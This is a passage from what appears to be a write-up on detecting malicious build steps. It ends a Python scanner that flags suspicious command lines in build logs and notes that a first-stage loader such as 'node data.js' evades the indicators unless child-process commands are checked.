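            findings.append((line_no, hits))
    return findings


if __name__ == "__main__":
    for line_no, hits in scan_build_log(SAMPLE_COMMANDS):
        print(f"line {line_no}: {', '.join(hits)}")
```

A first stage such as `node data.js` matches none of these indicators, so the check needs the command lines of child processes spawned during the build, not only the configured build command.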
